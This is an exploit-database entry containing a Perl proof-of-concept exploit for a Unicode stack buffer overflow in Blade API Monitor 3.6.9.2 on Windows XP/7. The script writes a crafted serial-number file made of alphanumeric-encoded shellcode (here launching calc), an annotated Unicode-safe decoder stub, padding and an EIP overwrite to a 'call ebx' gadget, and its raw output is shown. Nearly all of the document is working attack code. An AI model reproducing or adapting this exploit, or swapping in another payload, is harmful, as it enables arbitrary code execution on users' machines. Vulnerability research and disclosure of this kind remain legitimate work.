
Blade API Monitor 3.6.9.2 - Unicode Stack Buffer Overflow

10 Jan 2012 00:00:00 — Reported by FullMetalFouad. Type: exploitdb. Source: www.exploit-db.com

Blade API Monitor Unicode Stack Buffer Overflow (the serial number!!) - Exploit allows execution of arbitrary code on Blade API Monitor version 3.6.9.2 on Windows XP/7 through a Unicode stack buffer overflow using a crafted serial number

Code
# Exploit Title: Blade API Monitor Unicode Stack Buffer Overflow (the serial number!!)  
# Date: 25/12/2011
# Author: FullMetalFouad
# Version: 3.6.9.2
# Tested on: Windows XP/7
################################################################

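use strict;
use warnings;

# Output path, relative to the current working directory. The script
# only assembles the byte strings below, writes them to this file as
# raw bytes and exits; nothing is executed or sent from here.
my $file = "bof_blade.txt";

# windows/Winexec - 178 bytes
# VERBOSE=false, EXITFUNC=process, CMD=calc encoder=Alpha3
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\calc.txt" --verbose
my $shellcode_calc =
    "hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J"
  . "0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I"
  . "2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W"
  . "0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p"
  . "034r032m334t3w3m02";

#
# first stage to prepare the $shellcode_calc execution :
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\shellcode.txt" --verbose
# "\x05\xF6\xFC\xFF\xFF"    ;# sub eax, 30A
# "\x33\xDB"                ;# xor ebx,ebx
# "\x33\xC9"                ;# xor ecx,ecx
# "\xFE\xC5"                ;# inc ch
#
# "\x43"                    ;# inc ebx
# "\x8A\x14\x58"            ;# mov     dl, [eax+ebx*2]
# "\x88\x14\x18"            ;# mov     [eax+ebx], dl
# "\xE2\xF7"                ;# loop
# "\xFF\xE0"                ;# jmp eax
my $shellcode =
    "hffffk4diFkTpk02Tpl0T0Bu"
  . "EE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0m";

# Padding: 104 bytes, then 2 bytes (ECX) and 6 bytes (EBP) as in the
# author's layout notes.
my $junk1 = "\xCC" x 104;
$junk1 .= "\x35" x 2;    # ECX
$junk1 .= "\x41" x 6;    # EBP

my $eip    = "\x3e\x43"; # 0x0043003e : call ebx | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [BladeAPIMonitor.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.6.9.2 (C:\Program Files\BladeAPIMonitor\BladeAPIMonitor.exe)
my $junk2  = "\x42" x 20;
my $buffer = "\x41" x 246;

# The four "parts" below are concatenated into $finder. Each byte is
# appended on its own line so the author's per-instruction annotation
# stays next to it.
my $part0 = "";
my $part1 = "";
my $part2 = "";
my $part3 = "";

# 0 part : we do EAX = EBX + length(part0+part1+part2 +1 ), to point to the first null byte of the loop code.
                                    #   _part_0_:__________________________________________________
$part0 .= "\x53";                   #   | 53                push ebx                               |
$part0 .= "\x45";                   #   | 004500            add [ebp+0x0],al  (nop)                |
$part0 .= "\xBA\x58\x58";           #   | BA00580058        mov edx, 58005800                      |
$part0 .= "\x45";                   #   | 004500            add [ebp+0x0],al                       |
$part0 .= "\x54";                   #   | 54                push esp                               |
$part0 .= "\x45";                   #   | 004500            add [ebp+0x0],al  (nop)                |
$part0 .= "\x5F";                   #   | 5F                pop edi                                |
$part0 .= "\x45";                   #   | 004500            add [ebp+0x0],al  (nop)                |
$part0 .= "\xB9\x3B\x3B";           #   | B9003B003B        mov ecx, 3B003B00  (diff)              |
$part0 .= "\xF5";                   #   | 00F5              add ch,dh                              |
$part0 .= "\x6F";                   #   | 006F00            add [edi+0x0],ch                       |
$part0 .= "\xD6";                   #   | D6                salc                                   |
$part0 .= "\x45";                   #   | 004500            add [ebp+0x0],al  (nop)                |
$part0 .= "\x5B";                   #   | 5B                pop ebx                                |
$part0 .= "\x45";                   #   | 004500            add [ebp+0x0],al  (nop)                |
$part0 .= "\x50";                   #   | 50                push eax                               |
$part0 .= "\x45";                   #   | 004500            add [ebp+0x0],al  (nop)                |
$part0 .= "\x54";                   #   | 54                push esp                               |
$part0 .= "\x45";                   #   | 004500            add [ebp+0x0],al  (nop)                |
$part0 .= "\x58";                   #   | 58                pop eax                                |
$part0 .= "\x45";                   #   | 004500            add [ebp+0x0],al  (nop)                |
$part0 .= "\xC1\x19";               #   | C10019            rol dword ptr [eax], 19                |
$part0 .= "\x45";                   #   | 004500            add [ebp+0x0],al  (nop)                |
$part0 .= "\x58";                   #   | 58                pop eax                                |
$part0 .= "\xC7";                   #   | 00C7              add bh,al                              |
$part0 .= "\x45";                   #   | 004500            add [ebp+0x0],al  (nop)                |
$part0 .= "\x53";                   #   | 53                push ebx                               |
$part0 .= "\x45";                   #   | 004500            add [ebp+0x0],al  (nop)                |
$part0 .= "\x58";                   #   | 58                pop eax                                |
$part0 .= "\x45";                   #   | 004500            add [ebp+0x0],al  (nop)                |
$part0 .= "\x52";                   #   | 52                push edx                               |
$part0 .= "\x45";                   #   | 004500            add [ebp+0x0],al  (nop)                |
#####################################   |__________________________________________________________|


# 1st part : we do EBX=0x00000000, and ECX=0x00000100 (approximative size of buffer)
                                    #   _part_1_:__________________________________________________
$part1 .= "\x6A";                   #   | 6A00              push dword 0x00000000                  |
$part1 .= "\x6A";                   #   | 6A00              push dword 0x00000000                  |
$part1 .= "\x5B";                   #   | 5B                pop ebx                                |
$part1 .= "\x45";                   #   | 004500            add [ebp+0x0],al  (nop)                |
$part1 .= "\x59";                   #   | 59                pop ecx                                |
$part1 .= "\x45";                   #   | 004500            add [ebp+0x0],al  (nop)                |
$part1 .= "\xBA\x01\x41";           #   | BA00010041        mov edx,0x41000100                     |
$part1 .= "\xF5";                   #   | 00F5              add ch,dh                              |
#####################################   |__________________________________________________________|

# 2nd part : The patching of the 'loop code' :
                                    #   _part_2_:__________________________________________________
$part2 .= "\x45";                   #   | 004500            add [ebp+0x0],al                       |
$part2 .= "\x5A";                   #   | 5A                pop edx                                |
$part2 .= "\x45";                   #   | 004500            add [ebp+0x0],al                       |
$part2 .= "\xC6\x32";               #   | C60032            mov byte [eax],0x32   ; 0x8A-0x58      |
$part2 .= "\x70";                   #   | 007000            add [eax+0x0],dh                       |
$part2 .= "\x40";                   #   | 40                inc eax                                |
$part2 .= "\x45";                   #   | 004500            add [ebp+0x0],al                       |
$part2 .= "\x40";                   #   | 40                inc eax                                |
$part2 .= "\x70";                   #   | 007000            add [eax+0x0],dh      ; 0x58           |
$part2 .= "\x40";                   #   | 40                inc eax                                |
$part2 .= "\x70";                   #   | 007000            add [eax+0x0],dh      ; 0x88  dh=58    |
$part2 .= "\x40";                   #   | 40                inc eax                                |
$part2 .= "\x45";                   #   | 004500            add [ebp+0x0],al                       |
$part2 .= "\xC6\x14";               #   | C60014            mov byte [eax],0x14   ; 0x14           |
$part2 .= "\x45";                   #   | 004500            add [ebp+0x0],al                       |
$part2 .= "\x40";                   #   | 40                inc eax                                |
$part2 .= "\x45";                   #   | 004500            add [ebp+0x0],al                       |
$part2 .= "\x40";                   #   | 40                inc eax                                |
$part2 .= "\x45";                   #   | 004500            add [ebp+0x0],al                       |
$part2 .= "\xC6\xE2";               #   | C600E2            mov byte [eax],0xE2   ; 0xE2           |
$part2 .= "\x45";                   #   | 004500            add [ebp+0x0],al                       |
$part2 .= "\x40";                   #   | 40                inc eax                                |
$part2 .= "\x45";                   #   | 004500            add [ebp+0x0],al                       |
                                    #   |__________________________________________________________|

# 3rd part : The loop code (stuffed with nulls of course)
                                    #   _part_3_:___________________________________________________
                                    #   |     ; eax points to our shellcode                        |
                                    #   |     ; ebx is 0x00000000                                  |
                                    #   |     ; ecx is 0x00000500 (for example)                    |
                                    #   |                                                          |
                                    #   |           label:                                         |
$part3 .= "\x43";                   #   | 43                inc ebx                                |
$part3 .= "\x14";                   #   | 8A1458            mov byte dl,[eax+2*ebx]                |
$part3 .= "\x30\x18";               #   | 881418            mov byte [eax+ebx],dl                  |
$part3 .= "\xF7";                   #   | E2F7              loop label                             |
                                    #   |__________________________________________________________|

my $finder = $part0 . $part1 . $part2 . $part3;

# Three-arg open with a lexical handle and an explicit failure check;
# the original 2-arg, unchecked open would silently "succeed" on a
# write error. binmode keeps the string bytes (0x80-0xFF included) from
# going through any text-mode translation on Windows.
open my $fh, '>', $file or die "open $file: $!";
binmode $fh;
print {$fh} $shellcode_calc . $junk1 . $eip . $junk2 . $finder . $shellcode
          . "\xFF\xFF\xFF\xFF" . $buffer . "\x43\x43\x43\x43";
# Buffered write errors only surface at close, so check it too.
close $fh or die "close $file: $!";
print "File Created successfully\n";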

# output: hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCChffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC


Vulners AI Score: 7.4 (High risk)